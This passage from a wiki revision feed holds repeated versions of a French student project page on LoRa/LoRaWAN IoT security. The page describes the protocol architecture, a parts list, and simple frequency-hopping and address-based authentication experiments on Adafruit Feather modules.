*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
= Changement de fréquence=&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
=Authentification =&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
==Authentification en 1 étape==&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet avec son adresse, l'adresse de destination, puis le message. Le récepteur peut checker si le message lui est dédié et par qui il est envoyé. &lt;br /&gt;
&lt;br /&gt;
Le désavantage est que si quelqu'un intercepte le message, il connaît les adresses des modules et peut envoyer des paquets en se faisant passer pour un émetteur. &lt;br /&gt;
 &lt;br /&gt;
== Authentification en 2 étapes ==&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définies à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond à la sienne, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur, il ne sait pas quel émetteur lui a envoyé un paquet.&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35698</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35698"/>
				<updated>2016-12-07T10:33:31Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Authentification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
 | 3&lt;br /&gt;
 | 8,05 € &lt;br /&gt;
 | 24,15 € &lt;br /&gt;
 | http://fr.farnell.com/stontronics/t6090dv/psu-raspberry-pi-5v-2-5a-uk-euro/dp/2520786 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 &lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
= Montage =&lt;br /&gt;
&lt;br /&gt;
Les Feather LoRa reçus, j'ai commencé à souder des fils de 16.5cm (pour 433 MHz) de long pour qu'ils servent d'antenne.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:antenne.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
J'ai commencé par prendre l'exemple fourni par le site adafruit pour voir si les modules fonctionnaient correctement.&lt;br /&gt;
&lt;br /&gt;
En utilisant un module comme émetteur et un autre comme récepteur, on obtient ces résultats :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Transmission.PNG|550px]]&lt;br /&gt;
[[Fichier:Reception.PNG|550px]]&lt;br /&gt;
&lt;br /&gt;
Les modules communiquent bien et se répondent.&lt;br /&gt;
&lt;br /&gt;
Les messages sont envoyés en clair et peuvent être  interceptés par tout le monde et dans un grand périmètre puisque la portée peut être de plusieurs kilomètres.&lt;br /&gt;
&lt;br /&gt;
De ce programme, j'ai déduit plusieurs fonctionnalités pour sécuriser la liaison.&lt;br /&gt;
&lt;br /&gt;
= Changement de fréquence=&lt;br /&gt;
&lt;br /&gt;
La fréquence du module LoRa est prévu pour 433 MHz. Cependant j'ai pu noter que changer cette fréquence pour l'émetteur et le récepteur garantissait toujours un bon fonctionnement si on ne dépasse pas certaines valeurs. D'après quelques tests, la plaque de fréquence peut varier de 390 à 550 MHz (faire plus de tests pour trouver les limites). &lt;br /&gt;
&lt;br /&gt;
Mais le récepteur et le transmetteur doivent être sur la même fréquence à 0.02 MHz près. On peut en déduire plusieurs centaines plages de fréquence juste pour le module 433 MHz.&lt;br /&gt;
&lt;br /&gt;
Un désavantage de cacher ces messages dans des fréquences précises est que si l'émetteur transmet des paquets en continu, on peut scanner certaines fréquences jusqu'à recevoir un paquet et connaître la fréquence précise. Cependant, les module LoRa émettent rarement en continu mais plutôt à des  temps définis et très peu de paquets.&lt;br /&gt;
&lt;br /&gt;
=Authentification =&lt;br /&gt;
&lt;br /&gt;
=== Authentification en 2 étapes ==&lt;br /&gt;
&lt;br /&gt;
Un problème pouvant survenir lorsque plusieurs récepteurs sont allumés et que des transmissions arrivent est que les récepteurs ne sauront pas à qui est destiné le paquet.&lt;br /&gt;
&lt;br /&gt;
J'ai créée un programme pour que l'émetteur et le récepteur aient une adresse définies à l'avance et ne puissent parler qu'entre eux.&lt;br /&gt;
&lt;br /&gt;
L'émetteur envoie un paquet contenant l'adresse du récepteur. Si le récepteur reçoit le paquet et que l'adresse correspond, il renvoie un paquet avec l'adresse de l'émetteur.&lt;br /&gt;
&lt;br /&gt;
L'émetteur ayant reconnu son adresse, il envoie le paquet contenant le message et le récepteur peut stocker les informations reçus.&lt;br /&gt;
&lt;br /&gt;
Ce programme n'a été réalisé qu'entre 2 modules. Le premier problème est que si plusieurs émetteurs doivent envoyer des paquets au même récepteur,&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35697</id>
		<title>P64 Sécurité de l'IOT</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=P64_S%C3%A9curit%C3%A9_de_l%27IOT&amp;diff=35697"/>
				<updated>2016-12-07T10:25:36Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Objectif du PFE=&lt;br /&gt;
&lt;br /&gt;
L’internet des objets (IoT) se démocratise de plus en plus dans nos appareils électroniques et la question de la sécurité se pose. Si un de ces objets connait une défaillance, l’ensemble des données lié à son réseau pourrait être compromises.&lt;br /&gt;
L’objectif de ce PFE est d’analyser le protocole réseau LORA et de déceler les failles de sécurité afin de les corriger.&lt;br /&gt;
&lt;br /&gt;
=Réseau LoRa=&lt;br /&gt;
&lt;br /&gt;
Le réseau LoRa ( Long Range ) est une technologie permettant aux objets connectés d’échanger des données de petites tailles. Le débit du réseau varie de 0,3 kb/s à 50 kb/s. La première utilité est que la consommation des objets est très faible garantissant une autonomie allant jusqu’à 10 ans. La portée maximale est d’environ 20km.&lt;br /&gt;
L'architecture du réseau LoRaWan est utilisée sous forme de réseau hiérarchique où chaque passerelle peut transmettre les messages entre les appareils terminaux et un serveur de réseau central en arrière-plan.&lt;br /&gt;
&lt;br /&gt;
Le protocole LoRa a 3 modes de fonctionnement:&lt;br /&gt;
&lt;br /&gt;
*L’envoi d’informations vers une antenne puis la réception d’informations immédiatement après. Le serveur ne pourra envoyer d’informations qu’au prochain cycle d’envoi. Ce mode à la moins grande consommation d’énergie et permet d’envoyer des données de manière régulière ( ex: capteur).  La portée maximale est d’environ 20 km en zone rurale et 1 km en zone urbaine.&lt;br /&gt;
&lt;br /&gt;
*La réception de données à intervalles réguliers et paramétrés à l’avance.&lt;br /&gt;
&lt;br /&gt;
* La réception d’informations en continu, c’est le mode qui consomme le plus.&lt;br /&gt;
&lt;br /&gt;
L’alliance LoRa a publié un programme de certification obligatoire consistant à vérifier que l’objet connecté répond aux contraintes fonctionnelles du standard LoRaWAN.&lt;br /&gt;
 &lt;br /&gt;
La bande utilisée est 868 MHz et 900 MHZ. Elle est assez large pour protéger le signal des interférences dù à l’environnement.&lt;br /&gt;
&lt;br /&gt;
==Composants du réseau LoRa==&lt;br /&gt;
&lt;br /&gt;
La solution LoRa est constitué de Nodes (noeuds) et de Gateways (passerelles) qui communiquent avec le serveur réseau. &lt;br /&gt;
&lt;br /&gt;
*Les noeuds sont utilisés pour mesurer des valeurs ou contrôler des systèmes externes. Ils ont une faible alimentation et communiquent par réseau sans fil avec un ou plusieurs passerelles. Les noeuds sont équipés d’un transmetteur LoRa géré par un microcontrôleur. Le microcontrôleur peut envoyer des commandes au transmetteur pour configurer les paramètres du réseau LoRa ou envoyer et recevoir des données d’application que le transmetteur enverra au réseau serveur par la passerelle.&lt;br /&gt;
Les noeuds sont usuellement en mode “call then listen”, ce qui veut dire que le noeud enverra des données au serveur et écoutera pendant une courte durée la réponse du serveur.&lt;br /&gt;
&lt;br /&gt;
*Les passerelles sont moins nombreuses et transfèrent les données depuis les noeuds jusqu’au serveur réseau en utilisant des connections IP standards. &lt;br /&gt;
La solution LoRa a donc une topologie “star of star”; où plusieurs noeuds communiquent à une ou plusieurs passerelles, qui communiquent à un serveur réseau unique.&lt;br /&gt;
Les passerelles n’ont pas de mesures de sécurités mais fonctionnent comme un tunnel entre les noeuds et le serveur.&lt;br /&gt;
&lt;br /&gt;
*Le serveur réseau représente le stockage des données envoyées depuis les noeuds. Il est la plupart du temps une interface web où les passerelles se connectent en utilisant le réseau cellulaire.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Schéma lora.png|600px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==LoRa Frame structure==&lt;br /&gt;
&lt;br /&gt;
La transmission d’un noeud à une passerelle est appelée uplink (liaison montante) et de la passerelle à un noeud downlink ( liaison descendante). Il y a 3 classes de réseau LoRaWAn : classe A, B et C. Les classes ont des frames différentes de uplink et downlink.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe A sont ceux qui consomment le moins niveau énergétique.&lt;br /&gt;
Lorsqu’un uplink est transmis, 2 fenêtres de downlink sont envoyés en réponse. La fréquence des transmissions est défini par le noeud.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe B sont similaires aux classes A mais ont plus de fenêtres de downlink, définis par les passerelles.&lt;br /&gt;
&lt;br /&gt;
Les noeuds de classe C sont en écoute permanente et sont donc toujours en downlink lorsqu’ils n’émettent pas en uplink. C’est le mode le plus consommateur en énergie mais il a moins de latence comparé aux autres pour la communication entre noeud et serveur.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Frame lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
==Pile de protocole LoRa==&lt;br /&gt;
&lt;br /&gt;
La pile de protocole LoRa est composée de 4 couches : &lt;br /&gt;
&lt;br /&gt;
* Couche Application LoRa &lt;br /&gt;
&lt;br /&gt;
* Couche MAC LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche Physique LoRa&lt;br /&gt;
&lt;br /&gt;
* Couche RF LoRa&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Couche lora.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche MAC contient les données relatives à la classe du noeud et varie selon son type.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Lora phy layer.PNG]]&lt;br /&gt;
&lt;br /&gt;
La couche physique construit le paquet pour transmettre l'information de la couche MAC à la couche radio.&lt;br /&gt;
La couche Radio PHY contient un préambule ( 8 octets ), un entête et des contrôles de redondance cycliques pour le PHY Payload et l’entête.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La couche PHY Payload commence par un entête MAC suivi d'un MAC Payload et d’un check d’intégrité du paquet. L’entête et le Payload contiennent les données de l’utilisateur plus des informations relatives au type de message et sur la version LoRa utilisée.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le Payload MAC est constitué d'un entête comportant les adresses de la source et de la destination ainsi qu'un frame counter pour protéger le message. Il est aussi formé d'un Frame port et d'un Frame Pyload qui contiennent les données de l'application. Le Frame Port est aussi utilisé pour déterminer si le message contient seulement des commandes MAC ou des données spécifiques à l'application.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Schéma de la communication==&lt;br /&gt;
[[Fichier:Schéma com lora.png]]&lt;br /&gt;
&lt;br /&gt;
==Matériel==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
 ! Matériel !! Quantité !!Prix à l'unité !! Prix Total !! URL !! statut&lt;br /&gt;
|-&lt;br /&gt;
 ! RF Adafruit Feather M0 RFM96 &lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,97 € &lt;br /&gt;
 | 95.91€  &lt;br /&gt;
 |http://www.mouser.fr/ProductDetail/Adafruit/3179/?qs=sGAEpiMZZMuC4zZxLL0ZTXmUcMwoRc9uEac7jsWPYbgAg4D4CJduaQ%3d%3d&lt;br /&gt;
 |Recu&lt;br /&gt;
 |-&lt;br /&gt;
! Raspberry PI&lt;br /&gt;
 | 3&lt;br /&gt;
 | 31,41 € &lt;br /&gt;
 | 94.23 € &lt;br /&gt;
 | http://fr.farnell.com/raspberry-pi/raspberrypi-modb-1gb/raspberry-pi-3-model-b/dp/2525225&lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Carte SD 4 Go &lt;br /&gt;
 | 3&lt;br /&gt;
 | 14,58 € &lt;br /&gt;
 | 43.74 € &lt;br /&gt;
 | http://fr.farnell.com/transcend/ts4gsdhc10/carte-sdhc-4gb-classe-10/dp/2290237 &lt;br /&gt;
 |Recu &lt;br /&gt;
|-&lt;br /&gt;
 ! Alimentation Raspberry Pi &lt;br /&gt;
